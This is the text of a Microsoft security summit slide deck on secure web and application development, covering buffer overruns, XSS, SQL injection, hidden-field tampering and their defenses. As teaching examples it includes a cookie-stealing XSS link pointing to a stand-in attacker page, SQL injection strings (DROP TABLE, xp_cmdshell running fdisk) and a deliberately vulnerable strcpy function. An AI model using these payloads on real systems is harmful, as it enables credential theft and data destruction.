Microsoft Australia Security Summit
Managing Risk: Managing Risk:
Application Development Application Development Principles and Best PracticesPrinciples and Best Practices
Dave GloverMicrosoft Pty Ltdhttp://blogs.msdn.com/dglover
Microsoft Australia Security Summit
The Gartner Group states: "Today over 70% of attacks against a
company's Web site or Web application come at the 'Application Layer' not the Network or System layer."
Microsoft Australia Security Summit
Agenda
Buffer Overruns
Arithmetic Errors
Cross-site Scripting
SQL Injection
Cryptography Weaknesses
Hidden Field Tampering
Canonicalization Issues
Web Services Security
The Others…
… And Finally
Microsoft Australia Security Summit
Agenda
Buffer Overruns
Arithmetic Errors
Cross-site Scripting
SQL Injection
Cryptography Weaknesses
Hidden Field Tampering
Canonicalization Issues
Web Services Security
The Others…
… And Finally
Microsoft Australia Security Summit
Buffer OverrunsOccurs when data exceeds the expected size and overwrites other values
Exists primarily in unmanaged C/C++ code
Includes four types: Stack-based
Heap overruns
V-table and function pointer overwrites
Exception handler overwrites
Can be exploited by worms and can result in:
Access Violation (Denial of Service)
Instability
Code Injection
Microsoft Australia Security Summit
How Stack-Based Buffer Overruns Work
#include <string.h>
void flawed(char * str) {char buffer[10]; strcpy(buffer, str);
}
void main() { flawed("This string is too long");
}
Microsoft Australia Security Summit
Defending Against Buffer Overruns
Deprecated and should be avoided…Strcpy, strncpy, CopyMemory MultiByteToWideChar,…
Use strsafe.h for safer buffer handlingUse the /GS compile option in Visual C++ .NETCheck all array indexesUse recognized file-path processing methods, such as splitpath (C runtime)Use managed code
But pay attention to PInvoke and COM Interop
Microsoft Australia Security Summit
Agenda
Buffer Overruns
Arithmetic Errors
Cross-site Scripting
SQL Injection
Cryptography Weaknesses
Hidden Field Tampering
Canonicalization Issues
Web Services Security
The Others…
… And Finally
Microsoft Australia Security Summit
Arithmetic Errors
Occur when the limitations of a variable are exceeded
Lead to serious runtime issues
Are often overlooked and underestimated
Include:Overflow – value too large for data type
Underflow – value too small for data type
Microsoft Australia Security Summit
Arithmetic Overflow- CalEngine- Purchase.aspx- GoodPurchase.aspx
Microsoft Australia Security Summit
Defending Against Arithmetic Errors
Understand the Limitations
Unit Test Boundary Conditions
Consider limitations of data types
Consider writing safe, reusable functions
Consider using a safe template class (if coding in C++)
Use Languages that support overflow checking – VB.NET and C# !!
Microsoft Australia Security Summit
Agenda
Buffer Overruns
Arithmetic Errors
Cross-site Scripting
SQL Injection
Cryptography Weaknesses
Hidden Field Tampering
Canonicalization Issues
Web Services Security
The Others…
… And Finally
Microsoft Australia Security Summit
Cross-Site Scripting
Malicious script is sent to a Web application as input.
Echoed back to a user’s browser, where it is executed
Targets your users, your application is the vehicle
Attacks are via carefully crafted hyperlinks
Allows hackers to:Execute malicious script in a client’s Web browser
Insert <script>, <object>, <applet>, <form>, and <embed> tags
Steal Web session information and cookies (inc Authentication)
Access the client computer resources
Microsoft Australia Security Summit
How Cross-Site Scripting Works
<a href="http://…/Search.aspx?Search=<script language='javascript'>document.location.replace('http://localhost/EvilPage.aspx?Cookie=‘ + document.cookie);</script>">…</a>
Query string contains embedded JavaScript thatredirects to the hacker’s page and transmits anycookies issued by Search.aspx in a query string
URL points to the site that the hacker wants to attack
Microsoft Australia Security Summit
What Is One-Click Attack
Site offers persistent sign-in option (cookies)
Victim user navigates to (or opens) an HTML page – perhaps a “once in a lifetime offer”
One or more actions are carried out using the trustof the victim user which is completely unsuspectingto that user
Microsoft Australia Security Summit
Cross Site Script Attacks- Search.aspx- Review.aspx- AntiXSS Library- Secure Controls- GoodSearch.aspx- Validation Controls- Secure Frames- One Click Attack
Microsoft Australia Security Summit
Defending Against Cross-Site Scripting Attacks
Do notTrust user input
Echo client-supplied data without encoding
Store secret information in cookies
DoTake advantage of ASP.NET’s validateRequest
Take advantage of ASP.NET’s ViewStateUserKey
Consider AntiXSS for data encoding
Use the HttpOnly cookie option
Use the <frame> security attribute
Implement Secure Custom Controls
Microsoft Australia Security Summit
Defending Against XSSInput validation – First line of defense
Output encoding
Platform features
Server.HtmlEncode() Ok: principle of exclusions or black-listing
Use Anti-XSSBetter: principle of inclusions or white-listing
Context: Non-persistent XSS. The product search feature of WIDGETCO displays the ‘searchstring’ input without sanitizing or encoding:
Bad code:
someLabel.Text = "Results for " + searchstring + ":";
Mitigation using Anti-XSS:
someLabel.Text = "Results for " + AntiXSS.EncodeHtml(searchstring) + ":";
Context: Non-persistent XSS. The product search feature of WIDGETCO displays the ‘searchstring’ input without sanitizing or encoding:
Bad code:
someLabel.Text = "Results for " + searchstring + ":";
Mitigation using Anti-XSS:
someLabel.Text = "Results for " + AntiXSS.EncodeHtml(searchstring) + ":";
Microsoft Australia Security Summit
Defending Against One-Click Attack
Browser’s cross-frame security limits this to a “write-only” attack
Concept for defense: Require a data element in the request which the attacker can’t supply
Check Referrer field
In .Net 1.1 use ViewStateUserKey
override protected void OnInit(EventArgs e){// ...
ViewStateUserKey = User.Identity.Name;// ...}
override protected void OnInit(EventArgs e){// ...
ViewStateUserKey = User.Identity.Name;// ...}
Microsoft Australia Security Summit
Agenda
Buffer Overruns
Arithmetic Errors
Cross-site Scripting
SQL Injection
Cryptography Weaknesses
Hidden Field Tampering
Canonicalization Issues
Web Services Security
The Others…
… And Finally
Microsoft Australia Security Summit
SQL Injection
Adds SQL statements to user input to:Probe databases, execute multiple SQL statements
Bypass authorization
Call built-in stored procedures
Exploits applications that don’t validate input
Input from <form> fields, query strings, cookies
Microsoft Australia Security Summit
How SQL Injection Works
SELECT COUNT (*) FROM UsersWHERE UserName=‘Jeff’AND Password=‘imbatman’
SELECT COUNT (*) FROM UsersWHERE UserName=‘’ or 1=1--AND Password=‘’
Model Query
Malicious Query
"or 1=1" matches everyrecord in the table
"--" comments out theremainder of the query
Microsoft Australia Security Summit
Examples Of SQL Injection
If the ID variable is read directly from a Web form or Windows form textbox, the user could enter any of the following
ALFKI1001
ALFKI1001' or 1=1 --
ALFKI1001'; DROP TABLE OrderDetail --
ALFKI1001'; exec xp_cmdshell('fdisk.exe') --
sqlString = Format.String(select count (*) from customers where username='{0}' and password='{1}‘, userName, password));
sqlString = Format.String(select count (*) from customers where username='{0}' and password='{1}‘, userName, password));
Microsoft Australia Security Summit
SQL Injection Attack- Login Attack- Search Page Attack- SQL Cmd Shell Attack
Microsoft Australia Security Summit
Defending Against SQL Injection
Code against SQL Injection AttacksSanitize all inputDon’t use Dynamic SQL commandsUse Secured Stored Procedures or Parameterized Commands
Run with least privilegeNever execute as “sa”Restrict access to built-in stored procedures
Store connection strings securelyIntegrated Security BetterEncrypt Web.Config Connections SectionDPAPI or Configuration Application Block
Do not echo database errors (fail intelligently)Apply administrative protections to SQL Server
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh14.asp
Microsoft Australia Security Summit
Agenda
Buffer Overruns
Arithmetic Errors
Cross-site Scripting
SQL Injection
Cryptography Weaknesses
Hidden Field Tampering
Canonicalization Issues
Web Services Security
The Others…
… And Finally
Microsoft Australia Security Summit
Cryptography Weaknesses
Inappropriate use of algorithmsCreating your own
Using weak ones
Incorrect application
Failure to keep keys secureInsecure storage
Extensive duration of use
The human factorAccidental release of private keys
Key
Plaintext
Ciphertext
Algorithm
I need three of the above to decrypt
your data!
I need three of the above to decrypt
your data!
Microsoft Australia Security Summit
Defending Against Cryptography Weaknesses
Recycle keys periodically
Use ACLs to restrict access to keys
Store keys on an external device
Use larger keys to provide increased security
Use DPAPI to simplify key management, if possible
Do not implement your own cryptographic routines
Microsoft Australia Security Summit
Agenda
Buffer Overruns
Arithmetic Errors
Cross-site Scripting
SQL Injection
Cryptography Weaknesses
Hidden Field Tampering
Canonicalization Issues
Web Services Security
The Others…
… And Finally
Microsoft Australia Security Summit
Hidden-Field Tampering
Exploits applications that persist data between requests by round-tripping it in hidden <input> fields
The techniqueLook for <input type="hidden" … > tags
Submit bogus requests with modified value attributes to spoof a Web server
Microsoft Australia Security Summit
How Hidden-Field Tampering Works
<input type="hidden" id="price" value="10000.00">
Page contains this…
Postback data should contain this…price="10000.00"
Instead it contains this…price="1.00"
Microsoft Australia Security Summit
Agenda
Buffer Overruns
Arithmetic Errors
Cross-site Scripting
SQL Injection
Cryptography Weaknesses
Hidden Field Tampering
Canonicalization Issues
Web Services Security
The Others…
… And Finally
Microsoft Australia Security Summit
Canonicalization Issues
There is usually more than one way to name something
Alternate representations exist for:File names
URLs
Devices (such as printers)
Hackers may exploit code that makes decisions based on file names or URLs
Microsoft Australia Security Summit
Canonicalization IssuesExample 1: File Names
1 MyLongFile.txt
2 MyLongFile.txt.
3 MyLong~1.txt
4 MyLongFile.txt::$DATA
Microsoft Australia Security Summit
Defending Against Canonicalization Issues
Use file-system security to restrict access to private data
Never make a decision based on a name
Disable the IIS Parent Paths setting
Encrypt Web.Config Sections
Microsoft Australia Security Summit
Encrypting Web.config sectionsaspnet_regiis -pc "SampleKeys" -exp aspnet_regiis -pa "SampleKeys" “domain\acct”aspnet_regiis -pef connectionStrings .aspnet_regiis -pdf connectionStrings .Web.config<configProtectedData defaultProvider="SampleProvider"> <providers> <add name="SampleProvider"
type="System.Configuration.RsaProtectedConfigurationProvider, System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL“ keyContainerName="SampleKeys" useMachineContainer="true" />
</providers> </configProtectedData>
Microsoft Australia Security Summit
Traversal Attacks- PathTraversal.htm- ViewImage.aspx- GoodProducts.aspx- Web.Config Encryption
Microsoft Australia Security Summit
Next Steps
Stay informed about securityMicrosoft Developers Network Security Center
http://msdn.microsoft.com/security/
Microsoft Security Guidance
http://www.microsoft.com/security/guidance/
Get additional security trainingFind online and in-person training seminars:
http://www.microsoft.com/seminar/events/security/
Read the book: Writing Secure CodeMichael Howard and David LeBlanc
ISBN: 0-7356-1722-8
Microsoft Australia Security Summit
Defending Against the Others
Improving Web Application SecurityThreats and Countermeasures
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnnetsec/html/ThreatCounter.asp
Microsoft Australia Security Summit
Security e-forum site www.microsoft.com.au/eforum
View On demand web casts of all presentations from this event (tell your work colleagues!)Online Live chats
Have a live chat with the Microsoft security experts you’ll see today. Check the e-forum site for the Live Chat schedule.
Plus lots more…
Evaluation forms - we value your feedback! Need help with your business’ security?
Q7 - register your interest on the eval form if you want to meet with Microsoft / a MS Security Solutions Partner to discuss solutions to address your Security challenges
Fill in your form to go into the draw to win a HP Media Centre PC or Xbox 360
Security seminar follow up…
Microsoft Australia Security Summit
Top Related